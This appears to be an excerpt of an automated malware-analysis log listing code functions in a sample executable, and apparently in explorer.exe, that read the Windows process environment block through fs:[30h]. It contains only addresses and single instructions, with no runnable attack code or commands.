Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77016 mov eax, dword ptr fs:[00000030h] 1_2_00A77016
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77016 mov eax, dword ptr fs:[00000030h] 1_2_00A77016
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77016 mov eax, dword ptr fs:[00000030h] 1_2_00A77016
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC4015 mov eax, dword ptr fs:[00000030h] 1_2_00AC4015
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC4015 mov eax, dword ptr fs:[00000030h] 1_2_00AC4015
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB2073 mov eax, dword ptr fs:[00000030h] 1_2_00AB2073
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1074 mov eax, dword ptr fs:[00000030h] 1_2_00AC1074
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A10050 mov eax, dword ptr fs:[00000030h] 1_2_00A10050
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A10050 mov eax, dword ptr fs:[00000030h] 1_2_00A10050
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A261A0 mov eax, dword ptr fs:[00000030h] 1_2_00A261A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A261A0 mov eax, dword ptr fs:[00000030h] 1_2_00A261A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1C182 mov eax, dword ptr fs:[00000030h] 1_2_00A1C182
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A185 mov eax, dword ptr fs:[00000030h] 1_2_00A2A185
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A841E8 mov eax, dword ptr fs:[00000030h] 1_2_00A841E8
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009FB1E1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009FB1E1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009FB1E1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov ecx, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2513A mov eax, dword ptr fs:[00000030h] 1_2_00A2513A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2513A mov eax, dword ptr fs:[00000030h] 1_2_00A2513A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9100 mov eax, dword ptr fs:[00000030h] 1_2_009F9100
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9100 mov eax, dword ptr fs:[00000030h] 1_2_009F9100
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9100 mov eax, dword ptr fs:[00000030h] 1_2_009F9100
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1B944 mov eax, dword ptr fs:[00000030h] 1_2_00A1B944
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1B944 mov eax, dword ptr fs:[00000030h] 1_2_00A1B944
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB171 mov eax, dword ptr fs:[00000030h] 1_2_009FB171
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB171 mov eax, dword ptr fs:[00000030h] 1_2_009FB171
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC962 mov eax, dword ptr fs:[00000030h] 1_2_009FC962
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A0AAB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A0AAB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2FAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A2FAB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2D294 mov eax, dword ptr fs:[00000030h] 1_2_00A2D294
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2D294 mov eax, dword ptr fs:[00000030h] 1_2_00A2D294
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A13A1C mov eax, dword ptr fs:[00000030h] 1_2_00A13A1C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAB260 mov eax, dword ptr fs:[00000030h] 1_2_00AAB260
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAB260 mov eax, dword ptr fs:[00000030h] 1_2_00AAB260
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8A62 mov eax, dword ptr fs:[00000030h] 1_2_00AC8A62
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3927A mov eax, dword ptr fs:[00000030h] 1_2_00A3927A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A84257 mov eax, dword ptr fs:[00000030h] 1_2_00A84257
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC5BA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC5BA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB138A mov eax, dword ptr fs:[00000030h] 1_2_00AB138A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAD380 mov ecx, dword ptr fs:[00000030h] 1_2_00AAD380
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A01B8F mov eax, dword ptr fs:[00000030h] 1_2_00A01B8F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A01B8F mov eax, dword ptr fs:[00000030h] 1_2_00A01B8F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2B390 mov eax, dword ptr fs:[00000030h] 1_2_00A2B390
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB131B mov eax, dword ptr fs:[00000030h] 1_2_00AB131B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF358 mov eax, dword ptr fs:[00000030h] 1_2_009FF358
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A23B7A mov eax, dword ptr fs:[00000030h] 1_2_00A23B7A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A23B7A mov eax, dword ptr fs:[00000030h] 1_2_00A23B7A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FDB40 mov eax, dword ptr fs:[00000030h] 1_2_009FDB40
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8B58 mov eax, dword ptr fs:[00000030h] 1_2_00AC8B58
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FDB60 mov ecx, dword ptr fs:[00000030h] 1_2_009FDB60
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0849B mov eax, dword ptr fs:[00000030h] 1_2_00A0849B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB14FB mov eax, dword ptr fs:[00000030h] 1_2_00AB14FB
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A76CF0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A76CF0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A76CF0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8CD6 mov eax, dword ptr fs:[00000030h] 1_2_00AC8CD6
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2BC2C mov eax, dword ptr fs:[00000030h] 1_2_00A2BC2C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC740D mov eax, dword ptr fs:[00000030h] 1_2_00AC740D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC740D mov eax, dword ptr fs:[00000030h] 1_2_00AC740D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC740D mov eax, dword ptr fs:[00000030h] 1_2_00AC740D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1746D mov eax, dword ptr fs:[00000030h] 1_2_00A1746D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A44B mov eax, dword ptr fs:[00000030h] 1_2_00A2A44B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8C450 mov eax, dword ptr fs:[00000030h] 1_2_00A8C450
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8C450 mov eax, dword ptr fs:[00000030h] 1_2_00A8C450
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A235A1 mov eax, dword ptr fs:[00000030h] 1_2_00A235A1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A2FD9B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A2FD9B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A0D5E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A0D5E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AA8DF1 mov eax, dword ptr fs:[00000030h] 1_2_00AA8DF1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A7A537 mov eax, dword ptr fs:[00000030h] 1_2_00A7A537
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC8D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A24D3B mov eax, dword ptr fs:[00000030h] 1_2_00A24D3B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A24D3B mov eax, dword ptr fs:[00000030h] 1_2_00A24D3B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A24D3B mov eax, dword ptr fs:[00000030h] 1_2_00A24D3B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FAD30 mov eax, dword ptr fs:[00000030h] 1_2_009FAD30
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1C577 mov eax, dword ptr fs:[00000030h] 1_2_00A1C577
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1C577 mov eax, dword ptr fs:[00000030h] 1_2_00A1C577
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A33D43 mov eax, dword ptr fs:[00000030h] 1_2_00A33D43
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A73540 mov eax, dword ptr fs:[00000030h] 1_2_00A73540
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A17D50 mov eax, dword ptr fs:[00000030h] 1_2_00A17D50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A746A7 mov eax, dword ptr fs:[00000030h] 1_2_00A746A7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC0EA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC0EA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC0EA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8FE87 mov eax, dword ptr fs:[00000030h] 1_2_00A8FE87
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A216E0 mov ecx, dword ptr fs:[00000030h] 1_2_00A216E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A076E2 mov eax, dword ptr fs:[00000030h] 1_2_00A076E2
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A38EC7 mov eax, dword ptr fs:[00000030h] 1_2_00A38EC7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAFEC0 mov eax, dword ptr fs:[00000030h] 1_2_00AAFEC0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A236CC mov eax, dword ptr fs:[00000030h] 1_2_00A236CC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8ED6 mov eax, dword ptr fs:[00000030h] 1_2_00AC8ED6
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAFE3F mov eax, dword ptr fs:[00000030h] 1_2_00AAFE3F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC600 mov eax, dword ptr fs:[00000030h] 1_2_009FC600
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC600 mov eax, dword ptr fs:[00000030h] 1_2_009FC600
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC600 mov eax, dword ptr fs:[00000030h] 1_2_009FC600
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A61C mov eax, dword ptr fs:[00000030h] 1_2_00A2A61C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A61C mov eax, dword ptr fs:[00000030h] 1_2_00A2A61C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FE620 mov eax, dword ptr fs:[00000030h] 1_2_009FE620
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0766D mov eax, dword ptr fs:[00000030h] 1_2_00A0766D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77794 mov eax, dword ptr fs:[00000030h] 1_2_00A77794
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77794 mov eax, dword ptr fs:[00000030h] 1_2_00A77794
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77794 mov eax, dword ptr fs:[00000030h] 1_2_00A77794
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A337F5 mov eax, dword ptr fs:[00000030h] 1_2_00A337F5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2E730 mov eax, dword ptr fs:[00000030h] 1_2_00A2E730
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC070D mov eax, dword ptr fs:[00000030h] 1_2_00AC070D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC070D mov eax, dword ptr fs:[00000030h] 1_2_00AC070D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A70E mov eax, dword ptr fs:[00000030h] 1_2_00A2A70E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A70E mov eax, dword ptr fs:[00000030h] 1_2_00A2A70E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F4F2E mov eax, dword ptr fs:[00000030h] 1_2_009F4F2E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F4F2E mov eax, dword ptr fs:[00000030h] 1_2_009F4F2E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1F716 mov eax, dword ptr fs:[00000030h] 1_2_00A1F716
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A8FF10
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A8FF10
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0FF60 mov eax, dword ptr fs:[00000030h] 1_2_00A0FF60
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8F6A mov eax, dword ptr fs:[00000030h] 1_2_00AC8F6A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0EF40 mov eax, dword ptr fs:[00000030h] 1_2_00A0EF40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829080 mov eax, dword ptr fs:[00000030h] 5_2_04829080
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A3884 mov eax, dword ptr fs:[00000030h] 5_2_048A3884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048A3884 mov eax, dword ptr fs:[00000030h] 5_2_048A3884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483849B mov eax, dword ptr fs:[00000030h] 5_2_0483849B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 mov eax, dword ptr fs:[00000030h] 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048690AF mov eax, dword ptr fs:[00000030h] 5_2_048690AF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485F0BF mov ecx, dword ptr fs:[00000030h] 5_2_0485F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485F0BF mov eax, dword ptr fs:[00000030h] 5_2_0485F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485F0BF mov eax, dword ptr fs:[00000030h] 5_2_0485F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F8CD6 mov eax, dword ptr fs:[00000030h] 5_2_048F8CD6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov ecx, dword ptr fs:[00000030h] 5_2_048BB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 5_2_048BB8D0
